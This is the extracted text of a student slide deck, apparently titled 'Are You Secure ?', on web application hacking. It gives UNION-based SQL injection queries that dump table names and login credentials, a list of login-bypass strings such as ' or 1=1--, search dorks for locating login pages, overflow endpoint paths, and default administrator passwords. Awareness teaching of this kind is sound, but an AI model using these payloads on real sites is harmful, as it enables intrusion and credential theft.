Upload
windu-gata
View
7
Download
0
Embed Size (px)
DESCRIPTION
You have to know how they crack your web site. So You can make your website safe
Citation preview
PowerPoint Presentation
Are You Secure ?
Team :Septema Umna Maulida(1312530247)
Ronny Tanjung (1311530263)
Wirawan Satyadi(1311530230)
Muhammad Fahmi(1312530148)
Fajar Agung Rizki(1311530404)
Bayu Laksono(1311530396)
Mai Gani Tamim(1311530107)
Rian Nurjaman(1311530123)
Husein Allmasyhur(1311530214)
- Rudi Fredrick(0911530335)
Web Application Hacking
Typical Web Application set-upWebServerDBDBWeb appWebClientWeb appWeb appWeb appHTTPrequest(cleartext or SSL)HTTP reply(HTML, Javascript, VBscript, etc)Plugins:PerlC/C++JSP, etcDatabase connection:ADO,ODBC, etc.SQL DatabaseApacheIISNetscape etcFirewall
Utility of FirewallsWebServerDBDBWeb appWeb appWeb appWeb appSun RPCNT ipc$wu-ftpdXXXHacks on OS network services prevented by firewalls.
Firewalls cannot preventWebServerWebClientweb server mis-configurationURL Interpretation Attacks.
Firewalls cannot preventWebServerWeb appWebClientWeb appWeb appWeb apppoor checking of user inputsURL Interpretation attacksInput Validation attacks.
Firewalls cannot preventWebServerDBDBWeb appWebClientWeb appWeb appWeb appInput Validation attacksExtend SQL statementsURL Interpretation attacksSQL Query Poisoning
Firewalls cannot preventWebServerDBDBWeb appWebClientWeb appWeb appWeb appReverse-engineering HTTP cookies.Input Validation attacksSQL query poisoningURL Interpretation attacksHTTP session hijacking.Impersonation.
URL Injection
URL :http://localhost/ronie/uas/index.php?status=detail&id=40Client Side$ID = $_GET['id'];
$hasil = mysql_query("SELECT * FROM news WHERE ID = $ID order by id desc");Server Side
CONTOH QUERY URL INJECTIONSyntax : union select all 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database()--Untuk Melihat nama-nama tabel di dalam database
Syntax : union select all 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()--Untuk melihat isi field dari tiap tabel
Syntax : union select all 1,group_concat(IDLogin,0x3a,Pass),3,4,5,6 from userweb--Untuk melihat isi record dari tabel userweb
URL :http://localhost/ronie/uas/index.php?status=detail&id=40 union select all 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database()--Client SideSELECT * FROM news WHERE ID = 40 union select all 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database()-- order by id descServer SideURL Injection
SQL Injection
Select * from User_Table where user=Boband pass=MyPass123MySQL ApplicationMYSQL
LIBRARYWeb Login PageMy SQL ServerAPACHE Serverlogin_script2.phpInternetUsername:Password:Select * from User_Table where user=%userand pass=%passBobMyPass123
MySQL InjectionSelect * from User_Table where users= or 1=1-- and pass=
MYSQL
LIBRARYWeb Login PageMy SQL ServerAPACHE Serverlogin_script2.phpInternetUsername:Password:Select * from User_Table where user=%userand pass=%pass or 1=1--
Login box
A common query:
SELECT * from table WHERE id=$id
We could inject some malicious query in this way:
http://www.host.com/file?id="malicious_code"
inurl:login.phpindex of:/admin/login.phpindex of login.phpPlay with SQL Injection :
Inject queries variations :admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='ahi') or ('a'='a
hi") or ("a"="a
Directory Browsing
Directory Browsing
Application Default
Application Default
Printer Buffer Overflow http://www.zzzz.com /null.printer
FrontPage Server Extensions Buffer Overflowhttp://www.zzzz.com /_vti_bin/_vti_aut/fp30reg.dll
Compaq Insight Manager (CIM)http://www.zzzz.com:2301username:passwordadministratror:administratoradministrator:[Null]operator:operator
Statistics/usage, /stat, /webstat, /wwwstatsApplication Default
Search Queries
Search Queries
THE END